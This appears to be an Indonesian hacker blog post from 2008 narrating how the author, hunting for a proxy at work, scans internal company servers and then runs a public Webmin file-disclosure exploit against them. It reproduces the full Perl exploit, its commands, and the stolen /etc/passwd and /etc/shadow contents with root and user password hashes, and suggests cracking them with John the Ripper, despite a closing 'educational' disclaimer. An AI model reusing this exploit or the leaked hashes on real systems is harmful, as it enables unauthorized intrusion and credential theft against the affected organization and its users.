By thesims
Published: January 13, 2008
Print
Email
Hmm pagi-pagi seperti biasa … pergi ke kantor pake motor , motor ini
sebagai 3 tahun perjuangan gw sampe gw bisa bekerja di salah satu
perusahaan walau gw Cuma outsource itulah aktifitas gw huh hari libur
gw masuk kebetulan ronda pagi … sampe kantor iseng-iseng oprek server
buatan sendiri walhasil mayan deh kegunaannya mulai dari simpen-simpen
file buat remote-remote ke network sampe buat mp3 streaming huh
daripada idle tuh server, gw nyalain kompie gw coba ngenet aahhh
ternyata gateway nya down kesel … mana gw lagi butuh buat browsing
gipula neh akses drop semua … iseng-iseng gw traceroute wah ternyata
bukan di hop si gateway server melainkan routing kearah luar alias ip
publik , inget banget gw neh pake router cisco … ahh gw cuekin aja dulu
deh masalah layer 3 ini , beralih ke layer 7 dulu… Keabisan ide
gw kepala mikir-dan mikir apa ya kayaknya ada kejanggalan ohh iyaaa !!!
seperti ada lampu neon dikepala gw , dulu pernah ada temen bilang pake
aja bal proxy.sibiru.co.id .. Hmm isengiseng gw mo tau nih proxy resolv kemana ya …. Neh hasil nya [iqbal@boc ~]$ dig proxies.sibiru.co.id ; <<>> DiG 9.3.3rc2 <<>> proxies.sibiru.co.id ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6317 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 4, ADDITIONAL: 3 ;; QUESTION SECTION: ;proxies.sibiru.co.id. IN A ;; ANSWER SECTION: proxies.sibiru.co.id. 384 IN A 10.1.10.19 proxies.sibiru.co.id. 384 IN A 10.1.10.17 proxies.sibiru.co.id. 384 IN A 10.1.10.18 ;; AUTHORITY SECTION: sibiru.co.id. 384 IN NS ns.sibiru.co.id. sibiru.co.id. 384 IN NS ns0.sibiru.co.id. sibiru.co.id. 384 IN NS ldap.sibiru.co.id. sibiru.co.id. 384 IN NS pusren01.risti.sibiru.co.id. ;; ADDITIONAL SECTION: ns.sibiru.co.id. 384 IN A 10.2.1.5 ns0.sibiru.co.id. 384 IN A 10.2.12.12 ldap.sibiru.co.id. 384 IN A 10.1.2.38 ;; Query time: 3 msec ;; SERVER: 10.11.15.220#53(10.11.15.220) ;; WHEN: Sun Jan 13 20:57:32 2008 ;; MSG SIZE rcvd: 217 Nah lihat yang dicetak tebal …. Ada 3 server nih gw coba test ping dulu mana yang reply [iqbal@boc ~]$ ping 10.1.10.19 PING 10.1.10.19 (10.1.10.19) 56(84) bytes of data. 64 bytes from 10.1.10.19: icmp_seq=1 ttl=60 time=26.1 ms 64 bytes from 10.1.10.19: icmp_seq=2 ttl=60 time=25.4 ms 64 bytes from 10.1.10.19: icmp_seq=3 ttl=60 time=25.9 ms 64 bytes from 10.1.10.19: icmp_seq=4 ttl=60 time=25.7 ms 64 bytes from 10.1.10.19: icmp_seq=5 ttl=60 time=25.3 ms 64 bytes from 10.1.10.19: icmp_seq=6 ttl=60 time=25.5 ms --- 10.1.10.19 ping statistics --- 6 packets transmitted, 6 received, 0% packet loss, time 5000ms rtt min/avg/max/mdev = 25.383/25.711/26.199/0.291 ms [iqbal@boc ~]$ ping 10.1.10.17 PING 10.1.10.17 (10.1.10.17) 56(84) bytes of data. 64 bytes from 10.1.10.17: icmp_seq=1 ttl=60 time=25.4 ms 64 bytes from 10.1.10.17: icmp_seq=2 ttl=60 time=26.6 ms 64 bytes from 10.1.10.17: icmp_seq=3 ttl=60 time=25.4 ms 64 bytes from 10.1.10.17: icmp_seq=4 ttl=60 time=25.5 ms 64 bytes from 10.1.10.17: icmp_seq=5 ttl=60 time=25.1 ms --- 10.1.10.17 ping statistics --- 5 packets transmitted, 5 received, 0% packet loss, time 3998ms rtt min/avg/max/mdev = 25.160/25.677/26.693/0.565 ms [iqbal@boc ~]$ ping 10.1.10.18 PING 10.1.10.18 (10.1.10.1 56(84) bytes of data. 64 bytes from 10.1.10.18: icmp_seq=1 ttl=60 time=25.6 ms 64 bytes from 10.1.10.18: icmp_seq=2 ttl=60 time=25.7 ms 64 bytes from 10.1.10.18: icmp_seq=3 ttl=60 time=25.2 ms 64 bytes from 10.1.10.18: icmp_seq=4 ttl=60 time=25.7 ms 64 bytes from 10.1.10.18: icmp_seq=5 ttl=60 time=25.4 ms 64 bytes from 10.1.10.18: icmp_seq=6 ttl=60 time=25.4 ms --- 10.1.10.18 ping statistics --- 6 packets transmitted, 6 received, 0% packet loss, time 5000ms rtt min/avg/max/mdev = 25.298/25.565/25.760/0.218 ms Wow keren … semua nya reply berarti proxynya gw tinggal cari nih port proxynya berikut hasil scan port yang gw lakukan [iqbal@boc ~]$ nmap 10.1.10.17-19 Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-01-13 21:06 WIT Interesting ports on 10.1.10.17: Not shown: 1673 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 6000/tcp filtered X11 8080/tcp open http-proxy 8443/tcp open https-alt 10000/tcp open snet-sensor-mgmt Interesting ports on 10.1.10.18: Not shown: 1672 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind 654/tcp open unknown 669/tcp open unknown 744/tcp open flexlm 6000/tcp open X11 8080/tcp open http-proxy 10000/tcp open snet-sensor-mgmt Interesting ports on 10.1.10.19: Not shown: 1671 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 111/tcp open rpcbind 698/tcp open unknown 713/tcp open unknown 841/tcp open unknown 6000/tcp open X11 8080/tcp open http-proxy 10000/tcp open snet-sensor-mgmt Nmap finished: 3 IP addresses (3 hosts up) scanned in 29.547 seconds
Wah diotak gw makin tanda tanya kayaknya 10000 itu untuk webmin ya ,
padahal gw Cuma cari proxy aja loh… kebeneran deh sekalian gw pengen
tau juga apakah ada hole nya tuh server. Usut punya usut ketemu di
website http://www.milw0rm.com/exploits/2017 gw copy paste deh tuh jadi
file webmin.pl berikut deh exploit webminnya [iqbal@boc expl]$ cat webmin.pl #!/usr/bin/perl # Exploit for WEBMIN and USERMIN less than 1.29x # ARBITARY REMOTE FILE DISCLOSURE # WORKS FOR HTTP AND HTTPS (NOW) # Thrusday 13th July 2006 # Vulnerability Disclosure at securitydot.net # Coded by UmZ! umz32.dll@gmail.com # # # # Make sure you have LWP before using this exploit. # USE IT AT YOUR OWN RISK # # GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................ # for other.. like AHMED n FAIZ ... (GET A LIFE MAN). # Revised on Friday 14th July 2006 use LWP::Simple; use LWP::UserAgent; my $userag = LWP::UserAgent->new; if (@ARGV < 4) { print("Usage: $0 " ; print("TARGETS are " ; print("0 - > HTTP " ; print(" 1 - > HTTPS " ; print("Define full path with file name " ; print("Example: ./webmin.pl blah.com 10000 /etc/passwd " ; exit(1); } ($target, $port,$filename, $tar) = @ARGV; print("WEBMIN EXPLOIT !!!!! coded by UmZ! " ; print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com " ; print("Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! " ; print("Attacking $target on port $port! " ; print("FILENAME: $filename " ; $temp="/..%01" x 40; if ($tar == '0' { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; $content=get $url; print(" FILE CONTENT STARTED" ; print(" ----------------------------------- " ; print("$content" ; print(" ------------------------------------- " ; } elsif ($tar == '1' { my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; my $req = HTTP::Request->new(GET => $url); my $res = $userag->request($req); if ($res->is_success) { print("FILE CONTENT STARTED " ; print("------------------------------------------- " ; print $res->as_string; print("------------------------------------------- " ; } else { print "Failed: ", $res->status_line, " "; } } # milw0rm.com [2006-07-15] [iqbal@boc expl]$ perl webmin.pl 10.1.10.18 10000 /etc/shadow 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 10.1.10.18 on port 10000! FILENAME: /etc/shadow Failed: 404 File not found Gagal nih [iqbal@boc expl]$ perl webmin.pl 10.1.10.19 10000 /etc/shadow 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 10.1.10.19 on port 10000! FILENAME: /etc/shadow Failed: 404 File not found Hasil diatas juga gagal [iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/passwd 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 10.1.10.17 on port 10000! FILENAME: /etc/passwd FILE CONTENT STARTED ------------------------------------------- HTTP/1.0 200 Document follows Connection: close Date: Fri, 11 Jan 2008 06:42:31 GMT Server: MiniServ/0.01 Content-Length: 1190 Content-Type: text/plain Last-Modified: Tue, 20 Jun 2006 08:38:14 GMT Client-Date: Fri, 11 Jan 2008 03:13:02 GMT Client-Peer: 10.1.10.17:10000 Client-Response-Num: 1 Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost Client-SSL-Cipher: AES256-SHA Client-SSL-Warning: Peer certificate not verified root :0:0:root:/root:/bin/bash bin :1:1:bin:/bin:/bin/sh daemon :2:2:daemon:/sbin:/bin/sh adm :3:4:adm:/var/adm:/bin/sh lp :4:7:lp:/var/spool/lpd:/bin/sh sync :5:0:sync:/sbin:/bin/sync shutdown :6:0:shutdown:/sbin:/sbin/shutdown halt :7:0:halt:/sbin:/sbin/halt mail :8:12:mail:/var/spool/mail:/bin/sh news :9:13:news:/var/spool/news:/bin/sh uucp :10:14:uucp:/var/spool/uucp:/bin/sh nobody :65534:65534:Nobody:/:/bin/sh rpm :13:101:system user for rpm:/var/lib/rpm:/bin/false vcsa :69:69:virtual console memory owner:/dev:/sbin/nologin rpc :70:70:system user for portmap:/:/bin/false xfs :71:71:system user for XFree86:/etc/X11/fs:/bin/false postfix :72:72:system user for postfix:/var/spool/postfix:/bin/false rpcuser :73:73:system user for nfs-utils:/var/lib/nfs:/bin/false squid :74:74:system user for squid:/var/spool/squid:/bin/false sshd :75:75:system user for openssh:/var/empty:/bin/true admin :501:501:admin:/home/admin:/bin/bash apache :76:76:system user for apache2:/var/www:/bin/sh mysql :77:77:system user for MySQL:/var/lib/mysql:/bin/bash iscan :503:503::/:/bin/false bowo :505:505::/home/bowo:/bin/bash bayu :506:506:Ariya Bayu:/home/bayu:/bin/bash Wah masuk tuh ……… I got u ………….. [iqbal@boc expl]$ perl webmin.pl 10.1.10.17 10000 /etc/shadow 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 10.1.10.17 on port 10000! FILENAME: /etc/shadow FILE CONTENT STARTED ------------------------------------------- HTTP/1.0 200 Document follows Connection: close Date: Fri, 11 Jan 2008 06:43:22 GMT Server: MiniServ/0.01 Content-Length: 800 Content-Type: text/plain Last-Modified: Sun, 25 Jun 2006 15:03:50 GMT Client-Date: Fri, 11 Jan 2008 03:13:51 GMT Client-Peer: 10.1.10.17:10000 Client-Response-Num: 1 Client-SSL-Cert-Issuer: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost Client-SSL-Cert-Subject: /O=Webmin Webserver on localhost/CN=*/emailAddress=root@localhost Client-SSL-Cipher: AES256-SHA Client-SSL-Warning: Peer certificate not verified root:$1$0R.FZtLM$WlBgN6.5NKBN7OafXgqNQ/:12887:0:99999:7::: bin:*:12515:0:99999:7::: daemon:*:12515:0:99999:7::: adm:*:12515:0:99999:7::: lp:*:12515:0:99999:7::: sync:*:12515:0:99999:7::: shutdown:*:12515:0:99999:7::: halt:*:12515:0:99999:7::: mail:*:12515:0:99999:7::: news:*:12515:0:99999:7::: uucp:*:12515:0:99999:7::: nobody:*:12515:0:99999:7::: rpm:!!:12515:0:99999:7::: vcsa:!!:12515:0:99999:7::: rpc:!!:12515:0:99999:7::: xfs:!!:12515:0:99999:7::: postfix:!!:12515:0:99999:7::: rpcuser:!!:12515:0:99999:7::: squid:!!:12515:0:99999:7::: sshd:!!:12515:0:99999:7::: admin:$1$lUbNGfKl$4/v4BWtT5bHGD.VDHa6cN/:12887:0:99999:7::: apache:!!:12515:0:99999:7::: mysql:!!:12515:0:99999:7::: iscan:!!:12516:0:99999:7::: bowo:$1$1I4B/3.T$tmnE.Za1kqrM5y8QGLYmS.:12550:0:99999:7::: bayu:!!:12848:0:99999:7:::
Ternyata si 10.1.10.17 ada holenya di webmin … wah bisa intip
/etc/passwd /etc/shadow … hmm awalnya cari proxy malah ketemu begini
ahh sudahlah gw copy paste aja tuh /etc/passwd dan /etc/shadow… mungkin
suatu saat berguna … dan mayan deh bisa intip … besoknya gw report
masalah ini ke si empunya ternyata dibales deh …. walaupun bisa dioprek
dengan john the ripper atau cari slocate.db ( cari *.conf plain text
password ) hihiihhi Thanks
to : Allah SWT … , Cyberlog : Sori baru bisa kirim artikel nih walaupun
cuma begini aja gw doain semoga istri lo sehat walafiat … , AdhietSlank
: Gimana kabar si doi lo kan jadi nikah gan tuh buru nikah deh lo ,
k1nk0n9 : yang masih sibuk ama kerjaan barunya yeh makan-makannya mana
nih … , Fl3xu5 : masih sibuk ama kulnya yeh … terus belajar bos jangan
patah semangat , Sukam : dimana kau cok kapan kita ketemu lagi lay … ,
Ariee & Rini : Thanks support dan dukungannya semoga anak lo
menjadi anak yang berguna map belum sempet ketemu si kecil and Ariee
BTS ama badan lo beratan badan lo heheheh … A-technique : Sori SOB gw
lom sempet ke depok lagi … by ym an aja wit hehehe , Jantap : Hhehee
Manager lapangan : banyak ilmunya neh orang mengenai perhitungan BTS
sukses terus … Letjen : sekolah hokum Cuma hobi computer nyambung juga
jadi pengacara gw nih … gratisan ya … sukses buat semua , ibnu : kirim
daku pyramid donk sekalian juga spinx nnya yaaaaaa …….. , z3r0byt3 :
gimana pak masih ngajar kah di bekasi ntar kapan mau kerumah situ minta
pencerahan , temen-temen kantor BOC : lets handling it okay , salam TheSimS aka Iqbal@sekuritionline.net Nb :
Mohon maaf jika ada pihak yang dirugikan karena tujuan ini sebagai
pembelajaran dan bukan tujuan untuk memanfaatkan sebuah kelemahan
system dan sifatnya tidak untuk menjatuhkan dan buat admin rajin-rajin
aja patching systemnya tuh webminnya ada hole tuh 
View Comments (0)
|
Sorry, your account does not have access to post comments.